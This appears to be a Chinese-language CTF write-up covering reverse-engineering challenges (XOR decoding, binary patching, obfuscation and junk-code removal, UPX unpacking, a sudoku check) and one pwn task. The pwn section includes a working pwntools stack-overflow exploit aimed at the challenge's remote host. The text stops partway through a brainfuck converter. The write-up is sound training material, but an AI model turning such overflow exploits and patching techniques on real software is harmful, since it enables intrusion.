搭建虚拟机
按照题目要求,安装VM,下载Ubuntu64镜像,在虚拟机里直接执行文件即可得到Flag
byaidu@ubuntu:~/ws$ ./movgcc
cnss{H31l0,1inUx!!}
Baby_string
Flag在原程序中以明文存储,用IDA加载并按Shift+F12查看字符串即可找到
.data:00403004 00000019 C cnss{7h1s_iS_wh4t_R3_1s}
Baby_encode
F5查看伪代码
scanf("%s", input);
for ( i = 0; i < strlen(flag); ++i )
flag[i] ^= 7u;
if ( !strcmp(flag, input) )
puts("Oh you got the flag!");
注意flag处存储着一段数据
.data:00403004 ; char flag[]
.data:00403004 _flag db 'ditt|7oXj~X`77777777C&z',0
发现将密文的每一位都异或上7就能得到Flag
#include <cstdio>
#include <cstring>
char flag[]="ditt|7oXj~X`77777777C&z";
int main()
{
for (int i=0;i<strlen(flag);i++) flag[i]^=7u;
printf("%s",flag);
}
//cnss{0h_my_g00000000D!}
snake
F5查看伪代码
v4 = dword_40EDC0 ^ 0xE9;
if ( v4 > 265 )
{
v5 = dword_40EDC0 ^ 0xE9;
sub_4032B3(v5);
}
由伪代码可知,当蛇的长度大于265时,游戏就能通关
考虑在关键命令处Patch,想办法把v4和v5的值改成266即可伪装成通关的状态
Tab查看汇编代码
.text:00402E87 loc_402E87: ; CODE XREF: sub_4027D6+6AB↑j
.text:00402E87 mov eax, ds:dword_40EDC0
.text:00402E8C xor al, 0E9h
.text:00402E8E cmp eax, 109h
.text:00402E93 jle short loc_402EA4
.text:00402E95 mov eax, ds:dword_40EDC0
.text:00402E9A xor al, 0E9h
.text:00402E9C mov [esp], eax
.text:00402E9F call sub_4032B3
查看上下文可知dword_40EDC0中存储着蛇的长度异或上0x0E9的结果,又因为266=0x10A=0x1E3^0x0E9,所以把两处mov eax, ds:dword_40EDC0都替换成mov eax, 1E3h,修改完成后记得Apply
这时再运行程序即可直接得到Flag
//cnss{CE_caN_ju5T_Act_w1lfulLy!!}
Baby_Assembly_Code
此题主要考察Linux64传参顺序
extern printf
SECTION .data
name: db 'mrh929', 0
HelloCnss: db 'hello,cnss!', 10, 9 , "---%s", 10,0
str1: db "Let's start reading the assembly code!",10,0
enc: db 0,0,0,7,6,83,83,0,19,11,84,79,7,17,65,5,73,29,14,77,4,4,0,0,2,18,31,6,24,14,13,13,73,12,1,69,68,0,0,0
str2: db "Come on!",10,0
exp1: db "%s%s",0
str3: db "input your answer:",10,0
exp2: db "(%d + %d + %d + %d * %d - (%d >> 1)) ^ %d = ?", 10, "%s" ,0
SECTION .text
global main
alter_str: //字符串编码,将edi指向的字符串中的每个值都异或上esi指向的字符串中的对应值,遇到0为止
push rbp //保存堆栈
mov rbp, rsp
xor ecx, ecx //清空ecx
label:
mov al, [edi+ecx] //edi+ecx地址中的值存到al寄存器
test al, al //判断al是否为零
je quit //zf=1即al为零跳到quit
mov bl, [esi+ecx] //esi+ecx地址中的值存到al寄存器
xor al, bl //用bl异或al
mov [edi+ecx], al //al中的值存到edi+ecx地址中
add ecx, 1 //ecx++指向下一位
jmp label //跳到label
quit:
leave //还原堆栈
ret //返回原函数
main: ;主函数从这里开始
push rbp //保存堆栈
mov rbp, rsp
mov rdi, HelloCnss //HelloCnss的地址存到rdi寄存器中
mov rsi, name //name的地址存到rsi寄存器中
call printf //输出HelloCnss和name
mov rdi, str1 //str的地址存到rdi寄存器中
mov rsi, enc //enc的地址存到rsi寄存器中
call alter_str //调用alter_str,用enc编码str1
mov rdi, exp1 //同理
mov rsi, str1
mov rdx, str2
call printf //调用printf函数,用exp1格式化输出str1和str2
mov rdi, exp2
mov rsi, 1
mov rdx, 2
mov rcx, 3
mov r8, 4
mov r9, 5
push str3
push 7
push 6
mov rax, 0
call printf //用exp2格式化输出其它参数,输出(1 + 2 + 3 + 4 * 5 - (6 >> 1)) ^ 7 = ? <换行> str3
//_fastcall尽可能用mov寄存器传参,_stdcall和_cdecl用push堆栈传参,顺序从右到左(至少C++里是这个顺序)
//64位linux下前6个参数用寄存器传入,后面的所有参数压栈传入
//32位linux下所有函数都用压栈传入
sub rsp, 10 //栈顶-10,提供大小为10的空间
mov rax, 0 //rax=0
mov rdi, 2 //rdi=2
mov rsi, rsp //rsi=栈顶,告诉函数栈空间位置
mov rdx, 10 //rdx=10即告诉函数栈空间大小为10
syscall //syscall是linux中间层,类似于int中断,这里通过syscall来调用sys_read读取用户输入
; prepare for fixing input
lea rcx, [rsi] //rcx=rsi
add rcx, rax //rcx指向字符串末尾
push 0x000a //压栈10
mov rdx, 0x2174686769722074
push rdx
mov rdx, 0x6f6e207369207325
push rdx
mov rax, rsp //压栈字符串”%s is not right!”,rax指向字符串
mov rdx, 0x000a21746867
push rdx
mov rdx, 0x6972207369207325
push rdx
mov rbx, rsp //压栈字符串”%s is right!”,rbx指向字符串
mov dl, [rsi]
cmp dl, 0x31
jne end
mov dl, [rsi+1]
cmp dl, 0x36
jne end
mov dl, [rsi+2]
cmp dl, 0xa
jne end //判断输入为16 <换行>,如果不是则跳到end
mov rdi, rbx //rdi指向字符串”%s is right!”
jmp stop //跳到stop
end:
mov rdi, rax //rdi指向字符串”%s is not right!”
stop:
; Fix the output
sub rcx, 1 //rcx-=1
mov byte [rcx], 0 //字符串末尾添0
; Show the result
xor rax, rax //rax=0
call printf //输出结果is (not) right!
mov rax, 0 //rax=0
leave //还原堆栈
ret //返回原函数
<--指针-->
此题主要考察有符号无符号类型转换
*(unsigned long long*)(a.var1) = 0x01020304aabbccdd
声明a.var1指向八个字节大小的空间,并在其中存储了八个字节的内容,在内存中的顺序是由低到高
a.var1[i]以unsigned char的形式一次从中取出一个字节并输出,%X接受四个字节,因为是无符号数,前三个字节全部补0即可
结果为
0xDD,0xCC,0xBB,0xAA,0x4,0x3,0x2,0x1,
a.var2[i]以char的形式一次从中取出一个字节,但%X接受四个字节,所以需要类型转换,又因为char是有符号数,所以需要判断符号位
处理01,02,03,04时候因为二进制最高位为0,要保证表示的数字不变,前面全部补0即可,没有影响
处理aa,bb,cc,dd时候因为二进制最高位为1,计算机中负数用补码表示,要保证表示的数字不变,前面全部补1,换成16进制即为F
结果为
0xFFFFFFDD,0xFFFFFFCC,0xFFFFFFBB,0xFFFFFFAA,0x4,0x3,0x2,0x1,
a.var1 + 8 + i
地址越位,指向存储在a.var1之后的a.var2,并将其指向的内容改写为0到7,而对a.var1的内容没有影响
结果为
0xDD,0xCC,0xBB,0xAA,0x4,0x3,0x2,0x1,
0x0,0x1,0x2,0x3,0x4,0x5,0x6,0x7,
Easy_Flat
F5查看伪代码
__isoc99_scanf("%s", s); v12 = strlen(s); v8 = 2094104837; while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( 1 ) { while ( v8 == -1910856655 ) { v4 = -1741896534; if ( v9 <= 25 ) v4 = 437352961; v8 = v4; } if ( v8 != -1741896534 ) break; v5 = strcmp(s, (const char *)(unsigned int)s2) == 0; v6 = 1105054524; if ( v5 ) v6 = 304955634; v8 = v6; } if ( v8 != -1214177781 ) break; sub_400610(s); v11 = 0; v8 = 658032998; } if ( v8 != -1113027527 ) break; v9 = 0; v8 = -1910856655; } if ( v8 != -170736245 ) break; ++v9; v8 = -1910856655; } if ( v8 != 304955634 ) break; sub_400640(s); v8 = 658032998; } if ( v8 != 437352961 ) break; s[v9] += v9; v8 = -170736245; } if ( v8 == 658032998 ) break; if ( v8 == 1105054524 ) { sub_400610(s); v8 = 658032998; } else if ( v8 == 2094104837 ) { v3 = -1113027527; if ( v12 != 26 ) v3 = -1214177781; v8 = v3; } }
注意到s2处存储着一段数据
.data:0000000000601050 ; char s2[4]
.data:0000000000601050 s2 db 63h, 6Fh, 75h, 76h, 7Fh, 35h, 68h, 6Dh, 7Dh, 3Eh, 6Dh, 6Ch, 60h, 3Eh, 3Eh, 7Dh, 6Fh, 42h, 65h, 72h, 7Bh, 67h, 49h, 78h, 6Ch, 96h
虽然代码经过混淆,但是很容易就能看出加密算法
通过如下三个关键语句,可以猜出程序的逻辑是把用户输入的Flag的每一位的ASCII都加上这一位的序数,再和程序中存储的密文进行比较
v9 = 0;
++v9;
s[v9] += v9;
所以只要把密文的每一位都减去这一位的序数就可以得到Flag了
#include <cstdio>
#include <cstring>
char flag[]={0x63,0x6F,0x75,0x76,0x7F,0x35,0x68,0x6D,0x7D,0x3E,0x6D,0x6C,0x60,0x3E,0x3E,0x7D,0x6F,0x42,0x65,0x72,0x7B,0x67,0x49,0x78,0x6C,0x96};
int main()
{
for (int i=0;i<sizeof(flag);i++) flag[i]-=i;
printf("%s",flag);
}
//cnss{0bfu5caT10n_1S_gR3aT}
Mips架构逆向
直接用IDA插件一把梭,或者照着Mips指令集硬翻就可以了
//cnss{71me_t0_le4rn_Mips}
辉夜大小姐想要玩游戏
F5查看伪代码
__isoc99_scanf("%s", s); v4 = s; if ( strlen(s) == v3 ) { v7 = 0; v8 = 0; while ( v7 <= 80 ) { if ( !dword_203020[v7] ) { v6 = v8++; dword_203020[v7] = s[v6] - 48; } ++v7; } v9 = 1; for ( i = 0; i <= 8; ++i ) { v4 = (char *)&dword_203020[9 * i]; v9 &= sub_F3B(v4); } for ( j = 0; j <= 8; ++j ) { v4 = (char *)&dword_203020[j]; v9 &= sub_FFA(v4); } for ( k = 0; k <= 2; ++k ) { for ( l = 0; l <= 2; ++l ) { v4 = (char *)&dword_203020[27 * k + 3 * l]; v9 &= sub_10C3(v4); } } if ( v9 ) { puts("don-dayo!"); sub_11A1(s); puts(byte_2032C0); } }
sub_F3B检测每行是否有重复数字
sub_FFA检测每行是否有重复数字
sub_10C3检测每个3x3区域是否有重复数字
容易联想到题目是在要求我们填入数独的答案
将dword_203020处的数据以每行9列的格式显示,可以印证上边的猜测
.data:0000000000203020 ; _DWORD dword_203020[104]
.data:0000000000203020 dword_203020 dd 0, 0, 7, 0, 0, 0, 4, 0, 0
.data:0000000000203020 ; DATA XREF: sub_127B+21↑o
.data:0000000000203020 ; main+F2↑o ...
.data:0000000000203020 dd 6, 0, 0, 3, 0, 0, 0, 0, 8
.data:0000000000203020 dd 0, 0, 0, 0, 0, 1, 0, 0, 0
.data:0000000000203020 dd 3, 0, 0, 9, 0, 0, 0, 0, 1
.data:0000000000203020 dd 0, 0, 0, 0, 4, 0, 2, 0, 0
.data:0000000000203020 dd 8, 0, 0, 0, 0, 0, 0, 0, 0
.data:0000000000203020 dd 0, 0, 2, 0, 0, 0, 0, 9, 0
.data:0000000000203020 dd 0, 0, 0, 6, 0, 0, 0, 0, 3
.data:0000000000203020 dd 0, 0, 4, 0, 0, 0, 0, 0, 0
.data:0000000000203020 dd 0, 0, 0, 0, 0, 0, 0, 0, 0
.data:0000000000203020 dd 0, 0, 0, 0, 0, 0, 0, 0, 0
接下来只需要把数据填到在线解数独网站上求解,再将结果输入到程序中即可得到Flag
//cnss{faN7ast1c_5ud0ku_R3verse!!}
Junk Code
开局F5,结果IDA代码分析失败,不能生成伪代码
Space查看汇编代码,发现存在大量垃圾代码导致IDA不能正常分析代码
分析如下的垃圾代码
.text:00411AC2 call $+5
.text:00411AC7 add dword ptr [esp], 5
.text:00411ACB retn
首先执行call $+5使得ret=00411AC7
再执行add dword ptr [esp], 5使得ret+=5,这时ret=00411ACC
最后执行retn,使得程序跳转到ret指向的位置,即00411ACC
考虑把call $+5替换成jmp $+10,或者把上述三条语句都nop掉,这样IDA就能正常分析代码了,这里用的是第一种方法
我们可以先把call $+5替换成jmp 00411ACCh,发现对应的字节从E8 00 00 00 00变为EB 08 00 00 00
同理我们可以利用C32asm把所有的E8 00 00 00 00都用EB 08 00 00 00来替换,这样就实现了所有call $+5到jmp $+10的转化
这时我们再F5就可以正常生成伪代码了
v26 = (int *)(unsigned __int8)*(&Str + i);
v33 = sub_41133E(v26);
v29 = dword_41D000[v32];
v32++;
if ( v33 != v29 )
{
return sub_41123A(v12, v11);
}
注意到dword_41D000处存储着一段数据
.data:0041D000 ; int dword_41D000[35]
.data:0041D000 dword_41D000 dd 0ED02Eh, 14519Fh, 173801h, 173801h, 1C683Ch, 2AEBEh
.data:0041D000 ; DATA XREF: sub_411780+1639↑r
.data:0041D000 dd 169D98h, 1872B0h, 17D3CDh, 0FB9DCh, 0D16FAh, 53D52h
.data:0041D000 dd 1B055h, 169D98h, 0ED02Eh, 0FB9DCh, 0D16FAh, 28AD0h
.data:0041D000 dd 14E08Ch, 0D16FAh, 53D52h, 400E9h, 0ED02Eh, 12B367h
.data:0041D000 dd 0D16FAh, 63088h, 1872B0h, 14519Fh, 2064Fh, 0D16FAh
.data:0041D000 dd 49854h, 14E08Ch, 4CCEFh, 0FB9DCh, 1DCFEBh
程序将用户输入内容的每一位都用sub_41133E加密再和程序中的密文比较,所以我们只需要建立一个反向映射即可解密密文,从而得到Flag
这里可以偷个懒,介绍一种从外部调用exe中函数的方法,众所周知exe和dll都是PE文件,所以可以把exe当成dll来用,需要使用CFF Explorer修改PE属性为DLL,网上有很多关于修改方法的文章,具体细节在此不再阐述
加载exe后把0~127作为参数依次调用sub_41133E可以很方便地得到映射关系,从而建立反向映射解密密文。
#include <stdio.h>
#include <windows.h>
#include <map>
using namespace std;
typedef int (*func1)(int);
map<int,int> keymap;
int code[]={0x0ED02E,0x14519F,0x173801,0x173801,0x1C683C,0x2AEBE,0x169D98,0x1872B0,0x17D3CD,0x0FB9DC,0x0D16FA,0x53D52,0x1B055,0x169D98,0x0ED02E,0x0FB9DC,0x0D16FA,0x28AD0,0x14E08C,0x0D16FA,0x53D52,0x400E9,0x0ED02E,0x12B367,0x0D16FA,0x63088,0x1872B0,0x14519F,0x2064F,0x0D16FA,0x49854,0x14E08C,0x4CCEF,0x0FB9DC,0x1DCFEB};
int main(){
HMODULE hdll = NULL;
hdll = LoadLibrary("JunkCode.exe");
if(hdll != NULL){
printf("YES\n");
func1 myfunc = ((func1)((PBYTE)hdll+0x1133E));
for (int i=0;i<128;i++)
{
int ret=myfunc(i);
keymap[ret]=i;
printf("%d->%d\n",i,ret);
}
for (int i=0;i<sizeof(code);i++)
{
char ch=(char)keymap[code[i]];
printf("%c",ch);
}
}else{
printf("NO\n");
}
FreeLibrary(hdll);
return 0;
}
//cnss{8rute_F0rce_7o_F@ck_Jun3_CoDe}
砰的前奏
F5查看伪代码
ssize_t key()
{
char buf; // [rsp+0h] [rbp-20h]
puts("Send me a string.");
return read(0, &buf, 0x100uLL);
}
int ans()
{
return system("cat ./flag");
}
查看栈帧
-0000000000000020 buf db 32 dup(?)
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
key函数存在缓冲区漏洞,利用栈溢出替换掉ret地址,使程序跳转到ans函数打印Flag
注意到ret前有buf+s=40字节的空间需要填充,所以构造payload = "A"*40 + p64(callsystem)
#!python
#!/usr/bin/env python
from pwn import *
p = remote("139.9.5.20",60609)
callsystem = 0x40070A
payload = "A"*40 + p64(callsystem)
p.send(payload)
p.interactive()
Pwn,得到Flag
byaidu@ubuntu:~$ python ./test.py
[+] Opening connection to 139.9.5.20 on port 60609: Done
[*] Switching to interactive mode
Send me a string.
cnss{W31c0me_t0_pwn1ng_w0r1d}
[*] Got EOF while reading in interactive
Confusion
F5查看伪代码
sub_426980("%s", &unk_4992A0);
sub_4026A4();
sub_4026CE();
sub_40280B();
sub_40275E();
sub_402B39();
if ( (unsigned __int8)sub_402B82(&unk_499322, &unk_499312) )
{
sub_402630();
}
sub_4026A4和sub_4026CE检测输入的格式
sub_40280B解密程序中存储的Flag密文
sub_40275E和sub_402B39分别用同一套算法来加密用户输入的Flag和刚才解密得到的Flag
对于前面的格式检测,填入cnss{00000000000000000000000000}即可绕过
发现程序会在运行时还原出明文Flag,所以只要在sub_40280B后下断点就可以从内存中找到Flag
.bss:004992E0 ; char aCnssUH4ve5ett1[50]
.bss:004992E0 aCnssUH4ve5ett1 db 'cnss{U_h4ve_5ett1ed_A_haRd_Gam3}',0
Surprise
F5查看伪代码,发现有Upx壳的相关信息,于是先脱Upx壳
upx surprise -d
再F5查看伪代码
第一层的密码位数很短,可以不用逆向出逻辑,直接就能暴力跑出来
接下来会有一个假跳转
需要查看汇编代码找到真正的跳转地址
真正的函数里会用Switch混淆过的代码来解密Flag,看下存在xor指令可以猜出来是这里用的是异或加密,但是具体的顺序看不出来
.text:00000000004017CD loc_4017CD: ; CODE XREF: .text:0000000000401A63↓j
.text:00000000004017CD mov eax, [rbp-0FCCh]
.text:00000000004017D3 cdqe
.text:00000000004017D5 mov eax, dword_6030E0[rax*4]
.text:00000000004017DC cmp eax, 1Fh ; switch 32 cases
.text:00000000004017DF ja loc_401A5B ; jumptable 00000000004017EF default case
.text:00000000004017E5 mov eax, eax
.text:00000000004017E7 mov rax, ds:off_4021D8[rax*8]
.text:00000000004017EF jmp rax ; switch jump
.text:00000000004017F1 ; ---------------------------------------------------------------------------
.text:00000000004017F1
.text:00000000004017F1 loc_4017F1: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004017F1 ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004017F1 mov eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 1
.text:00000000004017F7 add eax, 1
.text:00000000004017FA cdqe
.text:00000000004017FC mov eax, dword_6030E0[rax*4]
.text:0000000000401803 add [rbp-0FC8h], eax
.text:0000000000401809 add dword ptr [rbp-0FCCh], 2
.text:0000000000401810 jmp loc_401A5C
.text:0000000000401815 ; ---------------------------------------------------------------------------
.text:0000000000401815
.text:0000000000401815 loc_401815: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401815 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401815 mov eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 2
.text:000000000040181B add eax, 1
.text:000000000040181E cdqe
.text:0000000000401820 mov ecx, dword_6030E0[rax*4]
.text:0000000000401827 mov eax, [rbp-0FC8h]
.text:000000000040182D cdq
.text:000000000040182E idiv ecx
.text:0000000000401830 mov [rbp-0FC8h], edx
.text:0000000000401836 add dword ptr [rbp-0FCCh], 2
.text:000000000040183D jmp loc_401A5C
.text:0000000000401842 ; ---------------------------------------------------------------------------
.text:0000000000401842
.text:0000000000401842 loc_401842: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401842 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401842 mov eax, [rbp-0FC0h] ; jumptable 00000000004017EF case 3
.text:0000000000401848 xor [rbp-0FC4h], eax
.text:000000000040184E add dword ptr [rbp-0FCCh], 1
.text:0000000000401855 jmp loc_401A5C
.text:000000000040185A ; ---------------------------------------------------------------------------
.text:000000000040185A
.text:000000000040185A loc_40185A: ; CODE XREF: .text:00000000004017EF↑j
.text:000000000040185A ; DATA XREF: .rodata:off_4021D8↓o
.text:000000000040185A mov eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 4
.text:0000000000401860 cdqe
.text:0000000000401862 movzx eax, ds:byte_6031C0[rax]
.text:0000000000401869 movzx eax, al
.text:000000000040186C mov [rbp-0FC4h], eax
.text:0000000000401872 add dword ptr [rbp-0FCCh], 1
.text:0000000000401879 jmp loc_401A5C
.text:000000000040187E ; ---------------------------------------------------------------------------
.text:000000000040187E
.text:000000000040187E loc_40187E: ; CODE XREF: .text:00000000004017EF↑j
.text:000000000040187E ; DATA XREF: .rodata:off_4021D8↓o
.text:000000000040187E mov eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 5
.text:0000000000401884 cdqe
.text:0000000000401886 movzx eax, byte ptr ds:qword_6031A0[rax]
.text:000000000040188D movzx eax, al
.text:0000000000401890 mov [rbp-0FC0h], eax
.text:0000000000401896 add dword ptr [rbp-0FCCh], 1
.text:000000000040189D jmp loc_401A5C
.text:00000000004018A2 ; ---------------------------------------------------------------------------
.text:00000000004018A2
.text:00000000004018A2 loc_4018A2: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004018A2 ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004018A2 mov eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 6
.text:00000000004018A8 cdqe
.text:00000000004018AA movzx eax, byte_6030A0[rax]
.text:00000000004018B1 movzx eax, al
.text:00000000004018B4 mov [rbp-0FC0h], eax
.text:00000000004018BA add dword ptr [rbp-0FCCh], 1
.text:00000000004018C1 jmp loc_401A5C
.text:00000000004018C6 ; ---------------------------------------------------------------------------
.text:00000000004018C6
.text:00000000004018C6 loc_4018C6: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004018C6 ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004018C6 mov eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 7
.text:00000000004018CC add eax, 1
.text:00000000004018CF cdqe
.text:00000000004018D1 mov eax, dword_6030E0[rax*4]
.text:00000000004018D8 mov [rbp-0FC8h], eax
.text:00000000004018DE add dword ptr [rbp-0FCCh], 2
.text:00000000004018E5 jmp loc_401A5C
.text:00000000004018EA ; ---------------------------------------------------------------------------
.text:00000000004018EA
.text:00000000004018EA loc_4018EA: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004018EA ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004018EA mov eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 8
.text:00000000004018F0 add eax, 1
.text:00000000004018F3 cdqe
.text:00000000004018F5 mov eax, dword_6030E0[rax*4]
.text:00000000004018FC sub [rbp-0FC8h], eax
.text:0000000000401902 add dword ptr [rbp-0FCCh], 2
.text:0000000000401909 jmp loc_401A5C
.text:000000000040190E ; ---------------------------------------------------------------------------
.text:000000000040190E
.text:000000000040190E loc_40190E: ; CODE XREF: .text:00000000004017EF↑j
.text:000000000040190E ; DATA XREF: .rodata:off_4021D8↓o
.text:000000000040190E mov eax, [rbp-0FBCh] ; jumptable 00000000004017EF case 11
.text:0000000000401914 lea edx, [rax+1]
.text:0000000000401917 mov [rbp-0FBCh], edx
.text:000000000040191D cdqe
.text:000000000040191F mov edx, [rbp-0FC0h]
.text:0000000000401925 mov [rbp+rax*4-0FB0h], edx
.text:000000000040192C add dword ptr [rbp-0FCCh], 1
.text:0000000000401933 jmp loc_401A5C
.text:0000000000401938 ; ---------------------------------------------------------------------------
.text:0000000000401938
.text:0000000000401938 loc_401938: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401938 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401938 cmp dword ptr [rbp-0FBCh], 0 ; jumptable 00000000004017EF case 10
.text:000000000040193F jle short loc_40195D
.text:0000000000401941 sub dword ptr [rbp-0FBCh], 1
.text:0000000000401948 mov eax, [rbp-0FBCh]
.text:000000000040194E cdqe
.text:0000000000401950 mov eax, [rbp+rax*4-0FB0h]
.text:0000000000401957 mov [rbp-0FC0h], eax
.text:000000000040195D
.text:000000000040195D loc_40195D: ; CODE XREF: .text:000000000040193F↑j
.text:000000000040195D add dword ptr [rbp-0FCCh], 1
.text:0000000000401964 jmp loc_401A5C
.text:0000000000401969 ; ---------------------------------------------------------------------------
.text:0000000000401969
.text:0000000000401969 loc_401969: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401969 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401969 sub dword ptr [rbp-0FC8h], 1 ; jumptable 00000000004017EF case 12
.text:0000000000401970 add dword ptr [rbp-0FCCh], 1
.text:0000000000401977 jmp loc_401A5C
.text:000000000040197C ; ---------------------------------------------------------------------------
.text:000000000040197C
.text:000000000040197C loc_40197C: ; CODE XREF: .text:00000000004017EF↑j
.text:000000000040197C ; DATA XREF: .rodata:off_4021D8↓o
.text:000000000040197C mov eax, [rbp-0FB8h] ; jumptable 00000000004017EF case 13
.text:0000000000401982 mov [rbp-0FC8h], eax
.text:0000000000401988 add dword ptr [rbp-0FCCh], 1
.text:000000000040198F jmp loc_401A5C
.text:0000000000401994 ; ---------------------------------------------------------------------------
.text:0000000000401994
.text:0000000000401994 loc_401994: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401994 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401994 mov eax, [rbp-0FC8h] ; jumptable 00000000004017EF case 14
.text:000000000040199A mov [rbp-0FB8h], eax
.text:00000000004019A0 add dword ptr [rbp-0FCCh], 1
.text:00000000004019A7 jmp loc_401A5C
.text:00000000004019AC ; ---------------------------------------------------------------------------
.text:00000000004019AC
.text:00000000004019AC loc_4019AC: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004019AC ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004019AC mov eax, [rbp-0FCCh] ; jumptable 00000000004017EF case 20
.text:00000000004019B2 add eax, 1
.text:00000000004019B5 cdqe
.text:00000000004019B7 mov eax, dword_6030E0[rax*4]
.text:00000000004019BE cmp eax, [rbp-0FC8h]
.text:00000000004019C4 jl short loc_4019E0
.text:00000000004019C6 mov eax, [rbp-0FCCh]
.text:00000000004019CC add eax, 2
.text:00000000004019CF cdqe
.text:00000000004019D1 mov eax, dword_6030E0[rax*4]
.text:00000000004019D8 mov [rbp-0FCCh], eax
.text:00000000004019DE jmp short loc_401A5C
.text:00000000004019E0 ; ---------------------------------------------------------------------------
.text:00000000004019E0
.text:00000000004019E0 loc_4019E0: ; CODE XREF: .text:00000000004019C4↑j
.text:00000000004019E0 mov eax, [rbp-0FCCh]
.text:00000000004019E6 add eax, 3
.text:00000000004019E9 cdqe
.text:00000000004019EB mov eax, dword_6030E0[rax*4]
.text:00000000004019F2 mov [rbp-0FCCh], eax
.text:00000000004019F8 jmp short loc_401A5C
.text:00000000004019FA ; ---------------------------------------------------------------------------
.text:00000000004019FA
.text:00000000004019FA loc_4019FA: ; CODE XREF: .text:00000000004017EF↑j
.text:00000000004019FA ; DATA XREF: .rodata:off_4021D8↓o
.text:00000000004019FA mov eax, [rbp-0FC4h] ; jumptable 00000000004017EF case 21
.text:0000000000401A00 cmp eax, [rbp-0FC0h]
.text:0000000000401A06 jnz short loc_401A22
.text:0000000000401A08 mov eax, [rbp-0FCCh]
.text:0000000000401A0E add eax, 2
.text:0000000000401A11 cdqe
.text:0000000000401A13 mov eax, dword_6030E0[rax*4]
.text:0000000000401A1A mov [rbp-0FCCh], eax
.text:0000000000401A20 jmp short loc_401A5C
.text:0000000000401A22 ; ---------------------------------------------------------------------------
.text:0000000000401A22
.text:0000000000401A22 loc_401A22: ; CODE XREF: .text:0000000000401A06↑j
.text:0000000000401A22 mov eax, [rbp-0FCCh]
.text:0000000000401A28 add eax, 1
.text:0000000000401A2B cdqe
.text:0000000000401A2D mov eax, dword_6030E0[rax*4]
.text:0000000000401A34 mov [rbp-0FCCh], eax
.text:0000000000401A3A jmp short loc_401A5C
.text:0000000000401A3C ; ---------------------------------------------------------------------------
.text:0000000000401A3C
.text:0000000000401A3C loc_401A3C: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401A3C ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401A3C mov dword ptr [rbp-0FB4h], 1 ; jumptable 00000000004017EF case 30
.text:0000000000401A46 jmp short loc_401A5C
.text:0000000000401A48 ; ---------------------------------------------------------------------------
.text:0000000000401A48
.text:0000000000401A48 loc_401A48: ; CODE XREF: .text:00000000004017EF↑j
.text:0000000000401A48 ; DATA XREF: .rodata:off_4021D8↓o
.text:0000000000401A48 mov cs:dword_6031F4, 1 ; jumptable 00000000004017EF case 31
.text:0000000000401A52 add dword ptr [rbp-0FCCh], 1
.text:0000000000401A59 jmp short loc_401A5C
.text:0000000000401A5B ; ---------------------------------------------------------------------------
.text:0000000000401A5B
.text:0000000000401A5B loc_401A5B: ; CODE XREF: .text:00000000004017DF↑j
.text:0000000000401A5B ; .text:00000000004017EF↑j
.text:0000000000401A5B ; DATA XREF: ...
.text:0000000000401A5B nop ; jumptable 00000000004017EF default case
.text:0000000000401A5C
.text:0000000000401A5C loc_401A5C: ; CODE XREF: .text:00000000004017C8↑j
.text:0000000000401A5C ; .text:0000000000401810↑j ...
.text:0000000000401A5C cmp dword ptr [rbp-0FB4h], 0
.text:0000000000401A63 jz loc_4017CD
.text:0000000000401A69 mov eax, cs:dword_6031F4
.text:0000000000401A6F test eax, eax
.text:0000000000401A71 jnz short loc_401A7F
.text:0000000000401A73 mov eax, 0
.text:0000000000401A78 call sub_40083E
.text:0000000000401A7D ; ---------------------------------------------------------------------------
.text:0000000000401A7D jmp short loc_401A89
.text:0000000000401A7F ; ---------------------------------------------------------------------------
.text:0000000000401A7F
.text:0000000000401A7F loc_401A7F: ; CODE XREF: .text:0000000000401A71↑j
.text:0000000000401A7F mov eax, 0
.text:0000000000401A84 call sub_400856
.text:0000000000401A89 ; ---------------------------------------------------------------------------
.text:0000000000401A89
.text:0000000000401A89 loc_401A89: ; CODE XREF: .text:0000000000401A7D↑j
.text:0000000000401A89 nop
.text:0000000000401A8A mov rax, [rbp-8]
.text:0000000000401A8E xor rax, fs:28h
.text:0000000000401A97 jz short locret_401A9E
.text:0000000000401A99 call ___stack_chk_fail
.text:0000000000401A9E ; ---------------------------------------------------------------------------
.text:0000000000401A9E
.text:0000000000401A9E locret_401A9E: ; CODE XREF: .text:0000000000401A97↑j
.text:0000000000401A9E leave
.text:0000000000401A9F retn
.text:0000000000401A9F ; } // starts at 401747
这里可以用IDA动态调试跟下关键语句处的寄存器,发现是用之前第一层的密码来循环异或存储在dword_6030E0的一段数据,所以写个脚本解码就可以获得Flag了
//cnss{Be_c4refu1_ab0u7_yoUr_ha1r}
brainf**ker‘s challenge
没找到好用的Wheel,于是就自己写了个bf转cpp的程序
#include <cstdio>
#include <cstring>
char str[100000];
int inc,dec,tab,line;
void sl(int cnt){
for (int j=0;j<cnt;j++) printf(" ");
}
void el(){
printf("\n",line);
}
int main(){
freopen("code.bf","r",stdin);
freopen("code.cpp","w",stdout);
